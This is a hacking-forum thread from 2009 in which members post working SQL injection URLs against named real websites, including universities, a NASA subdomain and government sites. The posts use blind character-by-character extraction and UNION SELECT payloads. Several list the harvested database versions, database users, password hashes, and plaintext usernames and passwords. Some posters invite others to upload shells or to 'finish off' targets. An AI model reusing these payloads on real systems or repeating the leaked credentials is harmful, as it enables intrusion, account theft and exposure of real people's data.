SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. pinky07

    pinky07 Member

    http://www.bekkin.ru

    user:
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),1,1)))=109 m
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),2,1)))=121 y
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),3,1)))=115 s
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),4,1)))=113 q
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),5,1)))=108 l
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),6,1)))=98 b
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),7,1)))=101 e
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),8,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),9,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),10,1)))=105 i
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),11,1)))=110 n
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),12,1)))=64 @
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),13,1)))=108 l
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),14,1)))=111 o
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),15,1)))=99 c
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),16,1)))=97 a
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),17,1)))=108 l
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),18,1)))=104 h
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),19,1)))=111 o
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),20,1)))=115 s
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),21,1)))=116 t
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),22,1)))=0

    db:
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),1,1)))=98 b
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),2,1)))=101 e
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),3,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),4,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),5,1)))=105 i
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),6,1)))=110 n
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),7,1)))=0

    MySQL version:
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),1,1)=3 3
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version(),2,1)))=46 .
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),3,1)=2 2
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),4,1)=3 3
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version(),5,1)))=46 .
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),6,1)=5 5
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),7,1)=8 8
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version(),8,1)))=0
     
  2. Assembler

    Assembler Elder

    Code:
    http://unixdows.com/cms/php.php?id=-1%20union%20select%20version(),%20concat_ws(0x3a,user_id,user_password%20)%20from%20tbl_auth_user--
    Code:
    http://www.ihf-hr.org/cms/cms.php?sec_id=1&pag_id=-4%20union%20select%20version()--
     
    #7602 Assembler, 5 Feb 2009
    Last edited by a moderator: 5 Feb 2009
  3. Gorev

    Gorev Level 8

    IP Call

    http://www.smartcall.ro/document.php?doc=-7+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),4,5,6,7,8,9--

    Database Version: 5.0.18
    Database name: smartcall
    User name: smartcall@localhost


     
  4. pinky07

    pinky07 Member

    http://www.bkreml.ru

    user:
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),1,1)))='109 m
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),2,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),3,1)))='120 x
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),4,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),5,1)))='98 b
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),6,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),7,1)))='116 t
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),8,1)))='95 _
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),9,1)))='107 k
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),10,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),11,1)))='122 z
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),12,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),13,1)))='110 n
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),14,1)))='64 @
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),15,1)))='108 l
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),16,1)))='111 o
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),17,1)))='99 c
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),18,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),19,1)))='108 l
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),20,1)))='104 h
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),21,1)))='111 o
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),22,1)))='115 s
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),23,1)))='116 t
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),24,1)))='0

    db:
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),1,1)))='109 m
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),2,1)))='96 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),3,1)))='120 x
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),4,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),5,1)))='98 b
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),6,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),7,1)))='116 t
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),8,1)))='95 _
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),9,1)))='107 k
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),10,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),11,1)))='122 z
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),12,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),13,1)))='110 n
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),14,1)))='0

    MySQL version:
    http://www.bkreml.ru/?page=5'+and+substring(version(),1,1)='3 3
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),2,1)))='46 .
    http://www.bkreml.ru/?page=5'+and+substring(version(),3,1)='2 2
    http://www.bkreml.ru/?page=5'+and+substring(version(),4,1)='3 3
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),5,1)))='46 .
    http://www.bkreml.ru/?page=5'+and+substring(version(),6,1)='4 4
    http://www.bkreml.ru/?page=5'+and+substring(version(),7,1)='4 4
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),8,1)))='0
     
  5. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder

    www.condi.ru PageRank: 4 TIC: 450
    Code:
    http://www.condi.ru/news.php?news_id=-7+union+select+1,2,unhex(hex(concat_ws(user(),version(),database()))),4,5
    
    alink@localhost:4.1.18-log:condi

    www.zsk.ru PageRank: 5 TIC: 350
    Code:
    http://www.zsk.ru/news.php?newsid=32+union+select+1,2,3,4,concat_ws(0x3A,version(),user(),database()),6,7,8,9,10,11,12,13--
    
    P.S. Candidates for the repost check.
     
    #7605 AkyHa_MaTaTa, 5 Feb 2009
    Last edited: 5 Feb 2009
  6. spherics

    spherics Elder

    Another large company -) We get root

    Database Version: 5.0.45-community-nt
    Database name: vero_english
    User name: root@localhost

    We take the users from MySQL! There is only one. Oh, what a pity -)

    : root : *4F94E0B0F39112E823AFC0BFA211C72E2897226F

     
    2 people like this.
  7. BloodyMessage

    BloodyMessage Elder

    PR4

    +
    http://www.speedreading.com/ - PR3
    http://www.rocketreader.com/ - PR5

    Database Version: 5.0.45-community
    Database name: ebook_genre
    User name: root@localhost

    admin:b8ad16f54966251f85263ca612dbb705
    maya:c8772558781f513ea51a2312e8d1346a

    portaladmin@rocketreader.com:jim234be

    from the freeonlinebooks forum:
    speed:$H$9.Z3lXp2zBIoIY5hyIFoFtnzNBCyAa/ (found the password seagull692 in another database)

    speedreading forum:

    root:*5D81277EE8B4D2F2C50DA72812A9C12AF9A2DF3E

    There are also passwords from who knows where; I forgot while I was writing, but I think you will have no trouble finding out:

    admin:testrocket
    amjith:amjith
     
    #7607 BloodyMessage, 5 Feb 2009
    Last edited: 8 Feb 2009
    1 person likes this.
  8. yarbabin

    yarbabin HACKIN YO KUT

    Code:
    http://www.songlines.co.uk/topoftheworld/top-of-the-world.php?id=-37+union+select+1,2,version(),4,5,6,7,8/*
    4.1.22

     
    _________________________
  9. Gorev

    Gorev Level 8

    edu.ro

    http://www.geo.edu.ro/sgr/article.php?sid=-125+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--


    Database Version: 4.0.18
    Database name: sgr
    User name: root@localhost



    Found mysql.users with columns user, password

    Found users with columns email,name,uname,uid,pass
     
  10. zifanchuck

    zifanchuck Elder

    PR6
    http://www.realityofaid.org/news.php?id=-1+union+select+1,2,3,4,5,6--

    5.x branch

    if you upload a shell, PM me =)
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Code:
    http://travel.colacotwayweb.com.au/world.php?cat=-1003+union+select+1,2,table_name+from+information_schema.tables+limit+1,1--
    nothing interesting..

    5.0.67-community
     
    _________________________
  12. yarbabin

    yarbabin HACKIN YO KUT

    Code:
    http://www.sierra-tech.com/word.php?id=-6+union+select+1,2,3,4,5,version()/*
    4.1.12

    Code:
    http://www.asic-cafe.org/htm/CSA/word.php?id=-10+union+select+1,2,version(),4,5,6/*
    I recommend taking a look at this SQL injection)) ;)

    4.1.21
     
    _________________________
    1 person likes this.
  13. hackmen

    hackmen Banned

    Pr 6 Nas a.gov
    http://ares.jsc.na sa.gov/_Includes/People.cfm?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dbo_tblKABranches

    Finish it off yourselves =)
     
  14. spherics

    spherics Elder

    High Quality Asian Market



    Database Version: 5.0.24-standard
    Database name: lottepla
    User name: lottepla@67.59.151.227


    We take the admin guy


    Fields email : username : password : active

    : arsman@arsman.com : LotteOFFLIMITS : adminOFFLIMITS : 1



    Lots of software


    Database Version: 5.0.45-log
    Database name: gears_box
    User name: vovka@cgi1303.int.bizland.net


    Lots of users -) passwords in plaintext.

    Fields e_mail:pASSWORD

     
    #7614 spherics, 6 Feb 2009
    Last edited: 6 Feb 2009
    3 people like this.
  15. yarbabin

    yarbabin HACKIN YO KUT

    Code:
    http://sportsbuilders.org/page.php?id=-125'+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17/*
    4.1.22-standard-log
    PR: 4

    Code:
    http://mojetesty.pl/content/slownik/word.php?id=-3924+union+select+1,version(),3,4,5,6,7,8--
    5.0.51-2+tld2-log

    PR: 3
     
    _________________________
    1 person likes this.
  16. Assembler

    Assembler Elder

    Code:
    Posted: on antichat http://www.kbs-spritztechnik.com/cms.php?pageId=-2%20union%20select%20group_concat(table_name)%20from%20information_schema.tables--
    jokester: I get the feeling that nobody cares about the rules: in your previous post I deleted bluebit.com.au with the comment "REPOST", and you post it again in this one. Is this some new game, in case the moderator doesn't notice?
     
    #7616 Assembler, 6 Feb 2009
    Last edited by a moderator: 6 Feb 2009
  17. edichka

    edichka Member

    Code:
    http://depts.washington.edu/mcb/facultyinfo.php?id=-18+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8--
    Database Version: 5.0.27-standard
    Database name: facultyinfo
    User name: lowpriv@depts01.u.washington.edu

    User:password
     
    2 people like this.
  18. spherics

    spherics Elder

    FEDERAL GOVERNMENT OF NIGERIA

    Database Version: 5.0.45
    Database name: CONTENTS
    User name: contents@localhost


    5.0.24a-Debian_9-log
    vesmirweb@localhost
    vesmirweb
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Code:
    http://www.randersen.dk/privat/test/asd.php?todo=edit&id=-2+union+select+version(),2/*
    5.0.32-Debian_7etch8-log

    everything is terribly slow there..
    Code:
    http://www.africasia.com/themiddleeast/me.php?ID=-1973+union+select+version(),2,3,4,5,6,7,8,9/*
    4.1.20-log

    PR: 6
     
    _________________________
    #7619 yarbabin, 6 Feb 2009
    Last edited: 6 Feb 2009
    1 person likes this.
  20. Gorev

    Gorev Level 8

    http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*


    Version: 5.0.22-Debian_0ubuntu6.06.10-log
    Database : isj
    User : isj@localhost
     
    1 person likes this.